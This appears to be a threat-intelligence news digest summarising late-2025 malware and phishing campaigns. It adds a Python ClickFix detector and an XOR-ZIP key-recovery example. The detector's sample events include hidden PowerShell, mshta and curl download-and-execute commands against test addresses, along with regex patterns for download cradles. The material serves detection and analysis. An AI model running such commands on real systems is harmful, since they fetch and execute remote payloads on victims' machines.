On November 5, 2025, multiple high-profile YouTube creators reported receiving fake DMCA takedown notices that linked to malicious downloads, prompting researchers to analyze the campaign and disclose numerous related domains and IPs. Public analysis identified phishing domains (e.g., dmca-security[.]com, ms-team-ping4[.]com), rotating infrastructure with distinctive host banners and certificates, and additional related domains discovered via DNS and host-response pivots. #dmca-security #ms-team-ping4
Arctic Wolf Labs discovered a Brazilian-origin Loader-as-a-Service called Caminho that uses LSB steganography to hide .NET loaders inside images hosted on legitimate platforms and delivers diverse payloads including REMCOS RAT, XWorm, and Katz Stealer. The multi-stage campaign uses spear-phishing with obfuscated JS/VBS and PowerShell stages, in-memory .NET loading and process injection,…
The article details a race-condition vulnerability in Microsoft’s Cloud Files Minifilter driver (cldflt.sys) that allows privilege escalation by bypassing filename validation during placeholder creation. The vulnerability follows a time window between validati…
Tycoon 2FA is a Phishing-as-a-Service platform that uses an Adversary-in-the-Middle reverse proxy to capture credentials and session tokens from Microsoft 365 and Gmail logins, bypassing 2FA/MFA by relaying codes in real time. The kit uses obfuscated JavaScript, bot/debugger checks, hosted assets on services like Amazon S3, and dynamic templates to tailor attacks to organization-specific policies. #Tycoon2FA #Microsoft365 #Gmail
A phishing campaign called “I Paid Twice” targeted hotel establishments by using compromised Booking.com accounts and ClickFix social engineering to deliver PowerShell commands that deploy PureRAT, enabling theft of booking-extranet credentials and subsequent customer-targeted banking phishing. The operation leveraged a redirection/TDS infrastructure, hundreds of malicious domains, and a cybercrime ecosystem selling Booking.com logs and services such as traffers and log checkers. #PureRAT #ClickFix
Daily Recap: Google releases an emergency Chrome 142 update to fix high-risk vulnerabilities including RCE flaws, while Cisco patches critical firewall and UCCX vulnerabilities under active attack. Sandworm deploys data wipers targeting Ukraine’s grain sector, and various APTs use RMM tools, VM techniques, and covert Hyper-V VMs to evade EDR; notable incidents include the SonicWall cloud backup theft, the Nikkei breach, the Hyundai AutoEver data exposure, and the Penn and Israeli contractor compromises. #Chrome142 #CVE-2025-20333 #CVE-2025-20362 #Sandworm #UNK_SmudgedSerpent #APT-C-60 #SpyGlace #CovertHyper-V #SonicWallTheft #Nikkei #HyundaiAutoEver #UPenn
ClickFix attacks have become more sophisticated, adding videos, timers, and OS detection to the fake CAPTCHA verification pages that deceive victims into pasting and executing malicious commands, typically to deploy information-stealing malware. #ClickFix #CloudflareCaptcha #Malvertising
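The lure-side tricks above (timers, OS detection, fake CAPTCHA) all end the same way on the host: a user-driven paste launches an interpreter from the Run dialog or a browser with a download-and-execute command line. The following detection logic, added here by the editor and not taken from the article, runs over a handful of constructed process-creation events (not real telemetry; addresses are RFC 5737 test ranges). The parent and interpreter sets, the indicator regexes and the two-indicator threshold are tuning choices for this example, not a published rule.

```python
import re

# Constructed process-creation events: parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://203.0.113.5/verify.txt | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.51.100.7/captcha"},
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c curl -s http://192.0.2.9/a.bat -o %TEMP%\a.bat && %TEMP%\a.bat"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process"},  # benign admin use
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\patch.ps1"},
]

# Parents a user-driven paste runs under: the Run dialog / Explorer address bar
# (explorer.exe) and browsers. Tuning choice for this example.
SUSPECT_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line traits of a pasted download-and-execute one-liner.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
        r"curl|wget|certutil|bitsadmin)\b", re.I),
    "remote_url": re.compile(r"\bhttps?://", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:c|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def indicators_for(cmdline: str) -> list:
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_clickfix_like(event: dict, min_indicators: int = 2) -> list:
    """Return the matched indicator names when an interpreter is launched from a
    paste-capable parent with at least `min_indicators` traits, else an empty list."""
    if basename(event["parent"]) not in SUSPECT_PARENTS:
        return []
    if basename(event["image"]) not in INTERPRETERS:
        return []
    hits = indicators_for(event["cmdline"])
    return hits if len(hits) >= min_indicators else []


def scan(events: list) -> list:
    """(index, indicator names) for every event that looks ClickFix-like."""
    alerts = []
    for i, event in enumerate(events):
        hits = is_clickfix_like(event)
        if hits:
            alerts.append((i, hits))
    return alerts


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']}\n  indicators: {', '.join(hits)}")
```

The parent check is what separates a pasted lure from a scheduled or service-launched script with an otherwise similar command line (the last event), so in production it should be fed from a telemetry source that records the true parent, such as Sysmon Event ID 1 or the EDR's process tree.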
Purple teaming promotes collaboration between red and blue teams, shifting from rivalry to continuous validation and improvement in cybersecurity defenses. Breach and Attack Simulation (BAS) automates real-time testing, enabling organizations to close security gaps effectively. #PurpleTeam #BreachAndAttackSimulation
Financial institutions are increasingly required to conduct comprehensive cybersecurity exercises due to new regulations like DORA and CORIE. Advanced simulation tools such as OpenAEV integrate technical and human responses, enhancing cyber-resilience and operational readiness. #DORA #CORIE #cyberresilience…
Chinese-linked APT actors combined scanning for known vulnerabilities with a multi-stage intrusion in April 2025 to establish persistent, stealthy access to a U.S. organization, employing DLL sideloading (vetysafe.exe -> sbamres.dll), legitimate binaries (msbuild.exe, Imjpuexc), scheduled tasks, a custom loader, and DCSync-like activity. #APT41 #Kelp #SpacePirates #Dcsync #DeedRAT
The threat actor Curly COMrades has been exploiting virtualization technology to evade detection and deploy custom malware on targeted systems. Their use of Hyper-V and virtual machines enables persistent remote control and avoids traditional security measures. #CurlyCOMrades #HyperV #Virtualization #CyberattackTools…
Cephalus is a Go-based ransomware group active since mid-June 2025 that breaches organizations mainly by compromising RDP accounts lacking MFA, exfiltrates data, and performs targeted encryption using a custom ransomware that disables protections and deletes backups. The malware uses a single AES-CTR key protected by memory-locking and XOR masking, generates fake…
Bitdefender and Georgian CERT uncovered a sophisticated cyber-espionage campaign by the Russian-aligned group Curly COMrades, using Microsoft Hyper-V virtualization to evade detection. They deployed stealthy virtual machines hosting custom malware families like CurlyShell and CurlCat to establish persistent, covert access to targeted networks in Eastern Europe and the Caucasus. #CurlyCOMrades #HyperV…
Gootloader, a JavaScript-based loader used by Storm-0494 to hand off access to Vanilla Tempest, has resurged with updated evasion including custom WOFF2 glyph-substitution fonts, XOR-encrypted ZIP payloads via compromised WordPress comment endpoints, and Startup-folder persistence enabling rapid reconnaissance and domain controller compromise. Post-intrusion, Vanilla Tempest commonly deploys Supper SOCKS5 backdoor (TextShell-obfuscated) and proceeds with AD enumeration, lateral movement (WinRM), privileged account creation, and ransomware deployment such as Rhysida and BlackCat. #Gootloader #Storm-0494 #Vanilla_Tempest #Supper_backdoor #Rhysida
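The XOR-encrypted ZIP payload mentioned above is a common loader trick, and a ZIP has enough fixed bytes (the local-file-header signature at the start, the end-of-central-directory record at the end) to recover a short repeating XOR key without knowing it. The following Python is an added example written by the editor, not Gootloader code or analysis from the article: it builds a tiny constructed ZIP holding a stand-in "payload.js", XOR-encrypts it with a key of its own choosing, then recovers the key by known-plaintext matching and validates the result by parsing the archive. It assumes a repeating-byte XOR and an archive with no trailing comment; the real scheme used by the loader is not described on this page.

```python
import io
import zipfile

# Constructed sample: a tiny ZIP with a stand-in "payload.js", encrypted with a
# 3-byte repeating XOR key. Nothing here is real Gootloader data.
KEY = b"\x5a\x13\xc7"


def make_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("payload.js", "var x = 1; // constructed stand-in, not loader code\n")
    return buf.getvalue()


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


SAMPLE_ZIP = make_sample_zip()
ENCRYPTED = xor_bytes(SAMPLE_ZIP, KEY)


def known_plaintext(length: int) -> dict:
    """Offsets whose plaintext bytes are fixed in a ZIP: the first local-file-header
    signature, and the end-of-central-directory record (signature, two zero disk
    numbers, and a zero comment length; assumes no archive comment)."""
    kp = {i: b for i, b in enumerate(b"PK\x03\x04")}
    eocd = length - 22
    for i, b in enumerate(b"PK\x05\x06\x00\x00\x00\x00"):
        kp[eocd + i] = b
    kp[length - 2] = 0  # comment length, low byte
    kp[length - 1] = 0  # comment length, high byte
    return kp


def open_if_zip(data: bytes):
    """Member names if data parses as an intact ZIP with valid CRCs, else None."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return None if z.testzip() is not None else z.namelist()
    except Exception:  # BadZipFile, zlib/struct errors on garbage input
        return None


def recover_zip(blob: bytes, max_key_len: int = 16):
    """Known-plaintext recovery of a repeating XOR key.

    For each candidate key length n, every known offset fixes key[offset % n];
    a length is accepted only if all known offsets agree and every key byte is
    determined, and the decrypted bytes then parse as a ZIP. Returns
    (key, member names) or (None, None)."""
    if len(blob) < 30:  # cannot hold a local header plus an EOCD record
        return None, None
    kp = known_plaintext(len(blob))
    for n in range(1, max_key_len + 1):
        key = [None] * n
        consistent = True
        for off, p in kp.items():
            k = blob[off] ^ p
            if key[off % n] is None:
                key[off % n] = k
            elif key[off % n] != k:
                consistent = False
                break
        if not consistent or None in key:
            continue
        candidate = bytes(key)
        names = open_if_zip(xor_bytes(blob, candidate))
        if names is not None:
            return candidate, names
    return None, None


if __name__ == "__main__":
    key, names = recover_zip(ENCRYPTED)
    print("recovered key:", key.hex() if key else None, "members:", names)
```

Because the EOCD record contributes eight consecutive known bytes, any key of up to eight bytes is fully determined regardless of the blob length; longer keys may leave gaps, in which case the candidate is skipped rather than guessed. The final ZIP parse is what rejects a key length that is merely consistent by coincidence.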
Proofpoint tracked a previously unidentified threat cluster dubbed UNK_SmudgedSerpent that targeted academics and foreign policy experts between June and August 2025 using benign conversation lures, credential harvesting pages, OnlyOffice and Teams spoofs, and RMM tool deployment. Observed TTPs and infrastructure overlapped with Iranian-aligned groups TA453, TA455, and TA450, but attribution remains…